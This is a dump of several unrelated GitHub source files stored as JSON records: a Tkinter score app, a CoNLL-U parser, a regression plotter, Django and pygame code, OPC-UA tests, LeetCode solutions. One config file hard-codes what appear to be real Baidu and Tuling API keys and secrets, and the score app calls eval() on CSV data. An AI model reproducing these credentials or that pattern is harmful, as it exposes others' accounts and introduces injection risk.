text=\"提交\", command=submit)\n button.grid(row=5, column=1)\n window2.mainloop()\n\n# 读取文件并保存到列表中\n# 读取文件\nwith open(\"student_score - 副本.csv\", \"r\",encoding='utf-8') as f:\n score_01 = []\n score_02 = []\n score_03 = []\n reader = csv.reader(f)\n # 将文件放入到列表里面\n score = [row for row in reader]\n for i in range(len(score)):\n score_01.append(eval(score[i][1]))\n score_02.append(eval(score[i][2]))\n score_03.append(eval(score[i][3]))\n# 关闭文件时将文件写入csv\ndef close_csv():\n with open(\"student_score - 副本.csv\", 'w') as f:\n for item in score:\n f.write(','.join(item) + '\\n')\n\ndef main():\n # 初始化对象\n L = Login()\n # 进行布局\n L.gui_arrang()\n # 主程序执行\n tkinter.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"eligous/student_manage_system-test","sub_path":"big_homework.py","file_name":"big_homework.py","file_ext":"py","file_size_in_byte":18440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34739010187","text":"import sys\nimport os\n\n\nclass Token(object):\n def __init__(self, index=-1, word=\"_\", lemma=\"_\", upos=\"_\", xpos=\"_\", feats=\"_\", head=\"_\", deprel=\"_\", deps=\"_\",\n misc=\"_\", parseme_mwe=\"_\"):\n self.index, self.is_compound_entry = self._int_try_parse(index)\n self.word = word\n self.lemma = lemma\n self.upos = upos\n self.xpos = xpos\n self.feats = feats\n self.head, _ = self._int_try_parse(head)\n self.deprel = deprel\n self.deps = deps\n self.misc = misc\n self.parseme_mwe = parseme_mwe\n\n def _int_try_parse(self, value):\n try:\n return int(value), False\n except ValueError:\n return value, True\n\n\nclass CONLLUPSentence(object):\n def __init__(self, id=None, tokens=None):\n self.tokens = []\n self.id = id\n if tokens != None:\n self.tokens = tokens\n\n def __repr__(self):\n sentence = \"\"\n for token in self.tokens:\n sentence += token.word\n if not \"SpaceAfter=No\" in token.misc:\n sentence += \" \"\n return sentence\n\n def to_text(self):\n lines = []\n if self.id != None:\n lines.append(\"# sent_id = {}\\n\".format(self.id))\n lines.append(\"# text = {}\\n\".format(self))\n for token in self.tokens:\n lines.append(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(\n token.index,\n token.word,\n token.lemma,\n token.upos,\n token.xpos,\n token.feats,\n token.head,\n token.deprel,\n token.deps,\n token.misc,\n token.parseme_mwe\n ))\n return lines\n\n\ndef read_file(filename):\n with open(filename, \"r\", encoding=\"utf8\") as f:\n lines = f.readlines()\n dataset = []\n tokens = []\n\n for line in lines:\n if line.startswith(\"#\"):\n if \"sent_id\" in line:\n sentence_id = line.replace(\"# sent_id = \", \"\").strip()\n tokens = []\n continue\n continue\n\n if line.strip() == \"\":\n if len(tokens) > 0:\n dataset.append(CONLLUPSentence(id=sentence_id, tokens=tokens))\n continue\n\n parts = line.strip().split(\"\\t\")\n if len(parts) != 11:\n print(\"ERROR processing line: [\" + line.strip() + \"], not a valid conllup format!\")\n sys.exit(0)\n\n token = Token(index=int(parts[0]), word=parts[1], lemma=parts[2], upos=parts[3], xpos=parts[4], feats=parts[5],\n head=parts[6], deprel=parts[7], deps=parts[8], misc=parts[9], parseme_mwe=parts[10])\n tokens.append(token)\n\n return dataset\n\n\ndef write_file(output_path, conllupdataset):\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n conllup_file_handle = open(os.path.join(output_path, \"output.conllup\"), \"w\", encoding='utf-8')\n conllup_file_handle.write(\"# global.columns = ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC PARSEME:MWE\\n\")\n for sentence_id, sentence in enumerate(conllupdataset):\n for line in sentence.to_text():\n conllup_file_handle.write(line)\n conllup_file_handle.write(\"\\n\")\n conllup_file_handle.close()\n\n\ndef extract_entities(conllup_sentences):\n all_sen_entity_list = list()\n\n for sentence in conllup_sentences:\n sen_entity_list = list()\n entity_pos = list()\n past_entity = None\n\n for token in sentence.tokens:\n entity = token.parseme_mwe\n\n if \":\" in entity:\n if len(entity_pos) > 0 and past_entity is not None:\n sen_entity_list.append((entity_pos, past_entity))\n\n entity_pos = list()\n entity_pos.append(token.index)\n past_entity = entity[2:]\n elif entity is not \"*\":\n entity_pos.append(token.index)\n\n if past_entity is not None:\n sen_entity_list.append((entity_pos, past_entity))\n\n all_sen_entity_list.append(sen_entity_list)\n\n return all_sen_entity_list\n","repo_name":"avramandrei/Information-Extraction-Romanian","sub_path":"utils/conllup.py","file_name":"conllup.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"9582646663","text":"def funcao_c(x, y):\n m = 0\n while not x + m > y:\n m += 1\n return m\n\nrm = input('Informe seu RM: ')\n'rm553759'\nresultado = funcao_c(int(rm[-1]), int(rm[0]))\nprint(resultado)\n","repo_name":"leooli-321/FIAP","sub_path":"Primeiro-semestre/#2 Computational Thinking Using Python/Atividades/CP3/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25703569181","text":"import math\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Restore the default plotting style.\nmpl.rcdefaults()\n\n# Specify the plotting style.\n# Figure Settings\n# DPI\nmpl.rcParams[\"figure.dpi\"] = 600\n# Layout\n# mpl.rcParams[\"figure.constrained_layout.use\"]: True\n# Size Constraints\n# Paper Size\npaper_size = [21.0, # W (cm)\n 29.7] # H (cm)\n# Margins\nplr_margins = [2.5, # L (cm)\n 2.5] # R (cm)\n# Width\ngraph_width = (paper_size[0] - plr_margins[0] - plr_margins[1]) / 2.54\n# Size\nmpl.rcParams[\"figure.figsize\"] = [graph_width, graph_width *\n # Paper Aspect Ratio\n paper_size[0] / paper_size[1]]\n# Marker\nmpl.rcParams[\"scatter.marker\"] = \".\"\n# Marker Radius\n# 0.3 mm\nmpl.rcParams[\"lines.markersize\"] = (0.3 * (mpl.rcParams[\"figure.dpi\"] / 25.4)) ** 2\n# Line Width\n# 0.1 mm\nmpl.rcParams[\"lines.linewidth\"] = 0.1 * math.sqrt(mpl.rcParams[\"lines.markersize\"])\n# LaTeX Compiler Settings\nmpl.rcParams[\"text.usetex\"] = True\n# Font\nmpl.rcParams[\"font.family\"] = \"Computer Modern Roman\"\n# Font Size\n# Global\nmpl.rcParams[\"font.size\"] = 10\n# Titles\nmpl.rcParams[\"axes.titlesize\"] = 10\n# Label Ticks\nmpl.rcParams[\"xtick.labelsize\"] = 8\nmpl.rcParams[\"ytick.labelsize\"] = 8\n# Preamble\nmpl.rcParams[\"text.latex.preamble\"] = \"\\\\usepackage{siunitx}\"\n# Writer Settings\n# Whitespace\nmpl.rcParams[\"savefig.bbox\"] = \"tight\"\n# Alpha Channel\nmpl.rcParams[\"savefig.transparent\"] = True\n\n\n# Enable this command if you encounter any graphics-related issues.\n# mpl.rcParams.update(mpl.rcParamsDefault)\n\n\ndef build_independent_variable_matrix(dependent_variable_matrix: np.ndarray, model_order: int) -> np.ndarray:\n \"\"\"\n Constructs the independent variable matrix of the regression model based on its desired order.\n\n Args:\n dependent_variable_matrix:\n The dependent variable matrix of the model.\n model_order:\n The order of the model.\n\n Returns:\n The independent variable matrix of the model.\n \"\"\"\n return np.array(\n [[x ** n for n in range(model_order + 1)] for x in range(1, len(dependent_variable_matrix) + 1)]).reshape(\n len(dependent_variable_matrix), -1)\n\n\ndef build_weight_matrix(dependent_variable_matrix: np.ndarray, model_order: int) -> np.ndarray:\n \"\"\"\n Constructs an initial, non-optimal weight matrix of the regression model based on its desired order.\n\n Args:\n dependent_variable_matrix:\n The dependent variable matrix of the model.\n model_order:\n The order of the model.\n\n Returns:\n The weight matrix of the model.\n \"\"\"\n # The initialization values have been chosen arbitrarily.\n return np.ones((model_order + 1, dependent_variable_matrix.shape[1]))\n\n\ndef subplot(ax, dependent_variable_matrix, independent_variable_matrix):\n # Scatter the observed positions.\n p = ax.scatter(dependent_variable_matrix[:, 0], dependent_variable_matrix[:, 1], dependent_variable_matrix[:, 2],\n alpha=1, c=list(range(1, len(dependent_variable_matrix) + 1)),\n cmap=plt.get_cmap('viridis', len(independent_variable_matrix)),\n # This parameter is required when using Axes3D.\n s=mpl.rcParams[\"lines.markersize\"])\n # Plot the observed trajectory.\n ax.plot(dependent_variable_matrix[:, 0], dependent_variable_matrix[:, 1], dependent_variable_matrix[:, 2],\n c=\"#000000\")\n # Set the primary axis labels.\n ax.set_xlabel(r\"\\textbf{X} (\\si{\\meter)\")\n ax.set_ylabel(r\"\\textbf{Y} (\\si{\\meter)\")\n ax.set_zlabel(r\"\\textbf{Z} (\\si{\\meter)\")\n return p\n\n\ndef plot_model(filename: str, dependent_variable_matrix: np.ndarray, independent_variable_matrix: np.ndarray) -> None:\n \"\"\"\n Generates a plot of the regression model and saves the corresponding figure to disk.\n\n Args:\n filename:\n The relative or absolute output file path.\n dependent_variable_matrix:\n The dependent variable matrix of the model.\n independent_variable_matrix:\n The independent variable matrix of the model.\n \"\"\"\n # Visualize the observed trajectory of the quadrocopter.\n # Create a 2x2 array of 3D subplots.\n fig, axs = plt.subplots(2, 2, subplot_kw={'projection': '3d'})\n # Specify the padding.\n # NOTE - Do not change the value of this parameter!\n plt.subplots_adjust(wspace=0.5, hspace=0.5)\n # Generate each subplot.\n for ax, i in zip(axs.flat, [0, 1, 2, 3]):\n # Set the camera to an isometric view.\n ax.view_init(azim=45 + i * 90, elev=math.degrees(math.asin(1 / math.sqrt(3))))\n # ax.set_box_aspect(aspect=None, zoom=0.9)\n\n sp = subplot(ax, dependent_variable_matrix, independent_variable_matrix)\n # Add a label specifying the azimuth of the camera.\n ax.set_title(r\"$\\alpha = {}$\".format(45 + i * 90) + r\"\\si{\\degree}\")\n # Add a common color bar to display time information.\n cb = plt.colorbar(sp, ax=axs.flat, label=r\"\\textbf{Time} (\\si{\\second)\",\n # NOTE - Do not change the value of this parameter!\n pad=0.2,\n # NOTE - Do not change the value of this parameter!\n ticks=1 + (np.arange(len(independent_variable_matrix)) + 0.5) * (\n len(independent_variable_matrix) - 1) / len(independent_variable_matrix))\n # Set the tick labels\n cb.ax.set_yticklabels(list(range(1, len(independent_variable_matrix) + 1)))\n # Hide the vertical axis ticks.\n cb.ax.axes.tick_params(length=0)\n\n plt.savefig(filename)\n\n\ndef objective(dependent_variable_matrix: np.ndarray, independent_variable_matrix: np.ndarray,\n weight_matrix: np.ndarray) -> float:\n \"\"\"\n Evaluates the objective function of the underlying optimization problem.\n\n Args:\n dependent_variable_matrix:\n The dependent variable matrix of the regression model.\n independent_variable_matrix:\n The independent variable matrix of the regression model.\n weight_matrix:\n The weight matrix of the regression model.\n\n Returns:\n The value of the objective function.\n \"\"\"\n # noinspection PyTypeChecker\n return np.sum((dependent_variable_matrix - independent_variable_matrix @ weight_matrix) ** 2)\n\n\ndef objective_gradient(dependent_variable_matrix: np.ndarray, independent_variable_matrix: np.ndarray,\n weight_matrix: np.ndarray) -> np.ndarray:\n \"\"\"\n Evaluates the gradient of the objective function of the underlying optimization problem.\n\n Args:\n dependent_variable_matrix:\n The dependent variable matrix of the regression model.\n independent_variable_matrix:\n The independent variable matrix of the regression model.\n weight_matrix:\n The weight matrix of the regression model.\n\n Returns:\n The gradient of the objective function.\n \"\"\"\n return 2 * independent_variable_matrix.T @ (independent_variable_matrix @ weight_matrix - dependent_variable_matrix)\n\n\ndef gradient_descent(gradient, dependent_variable_matrix: np.ndarray, independent_variable_matrix: np.ndarray,\n weight_matrix: np.ndarray, learning_rate: float = 1e-5, iter_eps: float = 1e+10,\n step_eps: float = 1e-15) -> None:\n \"\"\"\n Estimates the optimal weight matrix of the regression model by solving the underlying optimization problem.\n\n Args:\n gradient:\n The gradient of the objective function of the problem.\n dependent_variable_matrix:\n The dependent variable matrix of the regression model.\n independent_variable_matrix:\n The independent variable matrix of the regression model.\n weight_matrix:\n The weight matrix of the regression model.\n learning_rate:\n The learning rate.\n iter_eps:\n The maximum allowed number of iterations.\n step_eps:\n The minimum allowed iteration step.\n\n Note:\n This function modifies the weight matrix of the regression model!\n \"\"\"\n for _ in range(int(iter_eps)):\n step = learning_rate * gradient(dependent_variable_matrix, independent_variable_matrix, weight_matrix)\n if np.amax(np.abs(step)) < step_eps:\n break\n weight_matrix -= step\n\n\ndef main():\n # Dependent Variable Matrix\n X = np.array(\n [[+2.00, +0.00, +1.00], [+1.08, +1.68, +2.38], [-0.83, +1.82, +2.49], [-1.97, +0.28, +2.15],\n [-1.31, -1.51, +2.59],\n [+0.57, -1.91, +4.32]])\n\n # Linear Model - Constant Speed\n T1 = build_independent_variable_matrix(X, 1)\n W1 = build_weight_matrix(X, 1)\n\n plot_model(\"observedQuadcopterTrajectory\", X, build_independent_variable_matrix(X, 1))\n\n gradient_descent(objective_gradient, X, T1, W1)\n print(\"Linear Model - Optimal Model Weights:\\n\", W1)\n print(\"Linear Model - Residual Error:\\n\", objective(X, T1, W1))\n\n print('Linear Model - Speed:\\n', np.linalg.norm(W1[1, :]))\n\n # Quadratic Model - Constant Acceleration\n T2 = build_independent_variable_matrix(X, 2)\n W2 = build_weight_matrix(X, 2)\n\n gradient_descent(objective_gradient, X, T2, W2)\n print(\"Quadratic Model - Optimal Model Weights:\\n\", W2)\n print(\"Quadratic Model - Residual Error:\\n\", objective(X, T2, W2))\n\n next_timestep = np.array([1, 7, 49])\n print('Quadratic Model - Next Position:\\n', next_timestep @ W2)\n\n plot_model(\"estimatedQuadcopterTrajectory\", np.vstack((T2, next_timestep)) @ W2, np.vstack((T2, next_timestep)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"malukawasaki/GEO5017-Linear-Regression","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19799457656","text":"from api.serializers.AvatarSerializer import AvatarSerializer\nfrom api.models.Avatar import Avatar\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom api.models.User import User\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom rest_framework import status\n\nclass RegisterView (APIView):\n\n def post(self,request):\n user:User = User.objects.register(data=request.data)\n user.status = True\n user.save();\n avatar = Avatar.objects.create()\n user.avatar = avatar\n user.save()\n avatar = AvatarSerializer(avatar)\n token = RefreshToken.for_user(user)\n token = {\n \"refresh\": str(token),\n \"access\": str(token.access_token)\n }\n \n return Response({\n \"message\": \"User Created\",\n \"token\": token,\n \"avatar\": avatar.data\n })\n \n ","repo_name":"devup2332/backend-chat-app","sub_path":"api/views/RegisterUser.py","file_name":"RegisterUser.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74132856051","text":"import pygame\nfrom random import randrange\n\nfrom playerArea import PlayerArea\nfrom territory import Territory\nfrom map import Map\nfrom game_state import GameState\nfrom groups import Groups\nfrom territory_hex import King\n\nclass Render(pygame.sprite.Sprite):\n\n pngs = {\n 0: \"./sprites/background1.png\",\n 1: \"./sprites/background_your_turn.png\"\n }\n\n def __init__(self, width: int, height: int, game_state: GameState) -> None:\n pygame.sprite.Sprite.__init__(self) # Call the parent class (Sprite) constructor\n\n self.width = width\n self.height = height\n self.game_state = game_state\n self.nPlayers = game_state.nPlayers\n\n self.set_image(0)\n self.rect = (0, 0, *PlayerArea.size)\n\n # initialize player boards\n p0_center = (self.width * 1 / 8, self.height * 1 / 4)\n p1_center = (self.width * 1 / 8, self.height * 3 / 4)\n p2_center = (self.width * 7 / 8, self.height * 1 / 4)\n p3_center = (self.width * 7 / 8, self.height * 3 / 4)\n\n self.player_areas = []\n for player_number, center in enumerate([p0_center, p1_center, p2_center, p3_center]):\n team = player_number % 2\n cube_counts = game_state.players[player_number].court.get_cubes()\n # cube_counts = [randrange(0, 18) for i in range(5)]\n cache_list = game_state.players[player_number].cache.get_cube_list()\n # cache_list = sorted([randrange(0, 4) for i in range(7)])\n self.player_areas.append(PlayerArea(*center, team, cube_counts, cache_list))\n\n self.map = Map(self.width / 2, self.height / 2, [0] * 15)\n # self.terr = Territory(self.width / 2, self.height / 2, 0, 4)\n\n self.king_loc = 0\n self.king_width = 35\n self.king = King((self.map.territories[self.king_loc].x, self.map.territories[self.king_loc].y), self.king_width)\n\n def set_image(self, i):\n png_image = pygame.image.load(self.pngs[i])\n self.image = pygame.transform.smoothscale(png_image, (self.width, self.height))\n\n def update_game_state(self, game_state: GameState) -> None:\n print(\"render is updating game state\")\n for (player_area, game_player) in zip(self.player_areas, game_state.players):\n player_area.update(game_player)\n\n for color_id, controlling_player in enumerate(game_state.court_control_list):\n if controlling_player is not None:\n self.player_areas[controlling_player].show_control(color_id)\n\n self.map.update(game_state.territories)\n\n self.move_king(game_state.king)\n pass\n # def __init__(self, nPlayers, whose_turn, players, court_control_list, territories, king):\n\n def move_king(self, new_loc):\n self.king_loc = new_loc\n terr = self.map.territories[self.king_loc]\n coords = self.map.get_xy_by_angle_index(terr.outer_angle_index, terr.outer_radius - 60)\n self.king.move_center(coords)\n\n def draw(self, groups: Groups) -> None:\n self.add(groups.background_group)\n self.map.draw(groups)\n self.king.draw(groups.king)\n # self.terr.draw(group)\n for player_area in self.player_areas:\n player_area.draw(groups)","repo_name":"ianeyk/Carolus-Magnus","sub_path":"v1.0/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43664898151","text":"from uuid import uuid4\nfrom django.db import models\n\nfrom api.models.managers import CompanyManager\n\n\nclass Company(models.Model):\n \"\"\"\n - ID (en el formato que se considere más seguro)\n - Nombre\n - Status (activa/inactiva)\n \"\"\"\n\n objects = CompanyManager()\n\n COMPANY_STATUS_CHOICES = (\n (\"active\", \"Active\"),\n (\"inactive\", \"Inactive\"),\n )\n uuid = models.UUIDField(editable=False, unique=True, default=uuid4)\n name = models.CharField(max_length=100)\n status = models.CharField(\n choices=COMPANY_STATUS_CHOICES,\n default='active',\n max_length=10\n )\n\n def __str__(self):\n return f\"{self.name.title()} - {self.get_status_display()}\"\n\n def get_status_display(self):\n return dict(self.COMPANY_STATUS_CHOICES)[self.status]\n\n class Meta:\n verbose_name = \"Company\"\n verbose_name_plural = \"Companies\"\n ordering = [\"name\"]\n","repo_name":"JuanDM93/plerk-django-transactions","sub_path":"api/models/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73025875573","text":"import unittest\n\nfrom opcua import Client\nfrom opcua import Server\nfrom opcua import ua\n\nfrom tests_subscriptions import SubscriptionTests\nfrom tests_common import CommonTests, add_server_methods\nfrom tests_xml import XmlTests \n\nport_num1 = 48510\n\n\nclass TestClient(unittest.TestCase, CommonTests, SubscriptionTests, XmlTests):\n\n '''\n Run common tests on client side\n Of course we need a server so we start also start a server\n Tests that can only be run on client side must be defined in this class\n '''\n @classmethod\n def setUpClass(cls):\n # start our own server\n cls.srv = Server()\n cls.srv.set_endpoint('opc.tcp://localhost:{0:d}'.format(port_num1))\n add_server_methods(cls.srv)\n cls.srv.start()\n\n # start admin client\n # long timeout since travis (automated testing) can be really slow\n cls.clt = Client('opc.tcp://admin@localhost:{0:d}'.format(port_num1), timeout=10)\n cls.clt.connect()\n cls.opc = cls.clt\n\n # start anonymous client\n cls.ro_clt = Client('opc.tcp://localhost:{0:d}'.format(port_num1))\n cls.ro_clt.connect()\n\n @classmethod\n def tearDownClass(cls):\n #stop our clients\n cls.ro_clt.disconnect()\n cls.clt.disconnect()\n # stop the server \n cls.srv.stop()\n\n def test_service_fault(self):\n request = ua.ReadRequest()\n request.TypeId = ua.FourByteNodeId(999) # bad type!\n with self.assertRaises(ua.UaStatusCodeError):\n self.clt.uaclient._uasocket.send_request(request)\n\n def test_objects_anonymous(self):\n objects = self.ro_clt.get_objects_node()\n with self.assertRaises(ua.UaStatusCodeError):\n objects.set_attribute(ua.AttributeIds.WriteMask, ua.DataValue(999))\n with self.assertRaises(ua.UaStatusCodeError):\n f = objects.add_folder(3, 'MyFolder')\n\n def test_folder_anonymous(self):\n objects = self.clt.get_objects_node()\n f = objects.add_folder(3, 'MyFolderRO')\n f_ro = self.ro_clt.get_node(f.nodeid)\n self.assertEqual(f, f_ro)\n with self.assertRaises(ua.UaStatusCodeError):\n f2 = f_ro.add_folder(3, 'MyFolder2')\n\n def test_variable_anonymous(self):\n objects = self.clt.get_objects_node()\n v = objects.add_variable(3, 'MyROVariable', 6)\n v.set_value(4) #this should work\n v_ro = self.ro_clt.get_node(v.nodeid)\n with self.assertRaises(ua.UaStatusCodeError):\n v_ro.set_value(2)\n self.assertEqual(v_ro.get_value(), 4)\n v.set_writable(True)\n v_ro.set_value(2) #now it should work\n self.assertEqual(v_ro.get_value(), 2)\n v.set_writable(False)\n with self.assertRaises(ua.UaStatusCodeError):\n v_ro.set_value(9)\n self.assertEqual(v_ro.get_value(), 2)\n\n def test_context_manager(self):\n \"\"\" Context manager calls connect() and disconnect()\n \"\"\"\n state = [0]\n def increment_state(self, *args, **kwargs):\n state[0] += 1\n\n # create client and replace instance methods with dummy methods\n client = Client('opc.tcp://dummy_address:10000')\n client.connect = increment_state.__get__(client)\n client.disconnect = increment_state.__get__(client)\n\n assert state[0] == 0\n with client:\n # test if client connected\n self.assertEqual(state[0], 1)\n # test if client disconnected\n self.assertEqual(state[0], 2)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/FreeOpcUa_python-opcua/python-opcua-master/tests/tests_client.py","file_name":"tests_client.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"13896631851","text":"#coding=utf-8\n\n#录音文件保存路径\nWAVE_OUTPUT_FILENAME = \".out.wav\"\n#百度TTS合成音频文件路径\nBAIDU_TTS_MP3=\".tts.mp3\"\n\n#百度API设置\nAPI_KEY=\"f2QNCuDq3Xgr7PdpvIlzUG6GkSu806Ih\"\nSECRET_KEY=\"eIaCGbuPAtWtr7U98iVxDGxGHlrh6sGi\"\n\n#图灵API设置\nTULING_KEY = \"8950e43e268d4ea7b567658f21e3ce1c\"\nTULING_API = \"http://www.tuling123.com/openapi/api\"\n\n\n#触发录音阀值\nTHRESHOLD = 800\n\n#开启debug信息\nDEBUG = True\n","repo_name":"jingzhaoyang/Echo","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"ja","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"22887114971","text":"import argparse\nimport sys\nimport os\n\nfrom lintern.rewriter import CodeRewriter, rewrite_rules\nfrom lintern.cfile import add_required_include_paths\n\nimport yaml\n\n\ndef get_default_config_data():\n return {r.__class__.__name__ : True for r in rewrite_rules}\n\ndef verify_config_data(cfg_data):\n default = get_default_config_data()\n\n for key in cfg_data:\n if key not in default:\n return \"unrecognised option '%s'\" % key\n\n if not isinstance(cfg_data[key], bool):\n return \"invalid value '%s' for option '%s'\" % (str(cfg_data[key]), key)\n\n return None\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--indent-type', default='space', dest='indent_type',\n choices=['space', 'tab'], help=\"Set the type of indentation to be used\")\n parser.add_argument('-l', '--indent-level', default=4, dest='indent_level',\n help=\"Set the number of characters to use for a single indent level\")\n parser.add_argument('-f', '--config-file', default='.lintern', dest='config_file',\n help=\"Filename to read configuration from\")\n parser.add_argument('-i', '--in-place', action='store_true', dest='in_place',\n help=\"Re-write files in place. Default behaviour is to print \"\n \"modified files to stdout.\")\n parser.add_argument('-g', '--generate-config', action='store_true', dest='gen_config',\n help=\"Generate default configuration data, and print to stdout.\")\n parser.add_argument('-e', '--ignore-errors', action='store_true', dest='ignore_errors',\n help=\"Continue trying to parse & rewrite files, even if a parse\"\n \"error is encountered. Default is to bail out when any parse errors\"\n \"are encountered in a C file.\")\n parser.add_argument('-d', '--add-include-dir', action='append', dest='include_dirs',\n help=\"Add an extra include directory to pass to libclang\")\n parser.add_argument('filename', nargs='*')\n args = parser.parse_args()\n\n if args.gen_config:\n print(\"\\n\" + yaml.dump(get_default_config_data()))\n return 0\n\n if not args.filename:\n print(\"Please provide one or more input filenames.\")\n return 1\n\n if os.path.isfile(args.config_file):\n cfg_data = None\n\n try:\n with open(args.config_file, 'r') as fh:\n cfg_data = yaml.load(fh, Loader=yaml.FullLoader)\n except:\n print(\"Malformed file '%s', stopping.\" % args.config_file)\n return 1\n\n if cfg_data is None:\n print(\"Empty config file '%s', using default options.\" % args.config_file)\n cfg_data = get_default_config_data()\n else:\n result = verify_config_data(cfg_data)\n if result is not None:\n print(\"Error reading file %s: %s\" % (args.config_file, result))\n return 1\n else:\n print(\"configuration file '%s' not found, using default options.\" % args.config_file)\n cfg_data = get_default_config_data()\n\n extra_dirs = [] if args.include_dirs is None else args.include_dirs\n add_required_include_paths(extra_include_paths=extra_dirs)\n\n r = CodeRewriter(args, cfg_data)\n if r.files is None:\n return 1\n\n r.rewrite()\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"eriknyquist/lintern","sub_path":"lintern/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13191066285","text":"n = int(input())\nnums = list(map(int, input().split()))\n\nmax_num = max(nums)\n\nvisited = [False] * (max_num + 1)\nright = 0\nanswer = 0\ncount = 0\n\nfor left in range(n):\n while right < n and not visited[nums[right]]:\n visited[nums[right]] = True\n answer += 1\n right += 1\n\n if visited[nums[left]]:\n visited[nums[left]] = False\n answer += right - (left + 1)\n\nprint(answer)","repo_name":"Eui9179/algorithm-study","sub_path":"programmers/python/score_kit/two_pointer/boj13144.py","file_name":"boj13144.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10079387268","text":"'''\n394. 字符串解码\n给定一个经过编码的字符串,返回它解码后的字符串。\n\n编码规则���: k[encoded_string],表示其中方括号内部的 encoded_string 正好重复 k 次。注意 k 保证为正整数。\n\n你可以认为输入字符串总是有效的;输入字符串中没有额外的空格,且输入的方括号总是符合格式要求的。\n\n此外,你可以认为原始数据不包含数字,所有的数字只表示重复的次数 k ,例如不会出现像 3a 或 2[4] 的输入。\n\n示例:\n\ns = \"3[a]2[bc]\", 返回 \"aaabcbc\".\ns = \"3[a2[c]]\", 返回 \"accaccacc\".\ns = \"2[abc]3[cd]ef\", 返回 \"abcabccdcdcdef\".\n\n394. Decode String\nGiven an encoded string, return its decoded string.\n\nThe encoding rule is: k[encoded_string], where the encoded_string inside the square brackets is being repeated exactly k times. Note that k is guaranteed to be a positive integer.\n\nYou may assume that the input string is always valid; No extra white spaces, square brackets are well-formed, etc.\n\nFurthermore, you may assume that the original data does not contain any digits and that digits are only for those repeat numbers, k. For example, there won't be input like 3a or 2[4].\n\nExamples:\n\ns = \"3[a]2[bc]\", return \"aaabcbc\".\ns = \"3[a2[c]]\", return \"accaccacc\".\ns = \"2[abc]3[cd]ef\", return \"abcabccdcdcdef\".\n'''\n\n\nclass Solution(object):\n def decodeString(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n res = ''\n i = 0\n\n if not s:\n return \"\"\n while i < len(s):\n if \"0\" <= s[i] <= \"9\":\n num = int(s[i])\n while \"0\" <= s[i+1] <= \"9\":\n num = 10*num + int(s[i+1])\n i += 1\n # num = int(num)\n print(num, i)\n j = i+1\n if s[i+1] == \"[\":\n j = i + 2\n left = 0\n while s[j] != \"]\" or left != 0:\n if s[j] == \"[\":\n left += 1\n if s[j] == \"]\":\n left -= 1\n j += 1\n res += num * self.decodeString(s[i+2:j])\n i = j+1\n else:\n res += s[i]\n i += 1\n return res\n\n\nif __name__ == '__main__':\n demo = Solution()\n l = [\"3[a2[c]]\", \"3[a]2[bc]\", \"2[abc]3[cd]ef\"]\n for s in l:\n res = demo.decodeString(s)\n print(res)\n\n\n\n'''\n方法一:栈操作\n思路和算法\n\n本题中可能出现括号嵌套的情况,比如 2[a2[bc]],这种情况下我们可以先转化成 2[abcbc],在转化成 abcbcabcbc。我们可以把字母、数字和括号看成是独立的 TOKEN,并用栈来维护这些 TOKEN。具体的做法是,遍历这个栈:\n\n如果当前的字符为数位,解析出一个数字(连续的多个数位)并进栈\n如果当前的字符为字母或者左括号,直接进栈\n如果当前的字符为右括号,开始出栈,一直到左括号出栈,出栈序列反转后拼接成一个字符串,此时取出栈顶的数字(此时栈顶一定是数字,想想为什么?),就是这个字符串应该出现的次数,我们根据这个次数和字符串构造出新的字符串并进栈\n重复如上操作,最终将栈中的元素按照从栈底到栈顶的顺序拼接起来,就得到了答案。注意:这里可以用不定长数组来模拟栈操作,方便从栈底向栈顶遍历。\n\nC++JavaGolang\nfunc decodeString(s string) string {\n stk := []string{}\n ptr := 0\n for ptr < len(s) {\n cur := s[ptr]\n if cur >= '0' && cur <= '9' {\n digits := getDigits(s, &ptr)\n stk = append(stk, digits)\n } else if (cur >= 'a' && cur <= 'z' || cur >= 'A' && cur <= 'Z') || cur == '[' {\n stk = append(stk, string(cur))\n ptr++\n } else {\n ptr++\n sub := []string{}\n for stk[len(stk)-1] != \"[\" {\n sub = append(sub, stk[len(stk)-1])\n stk = 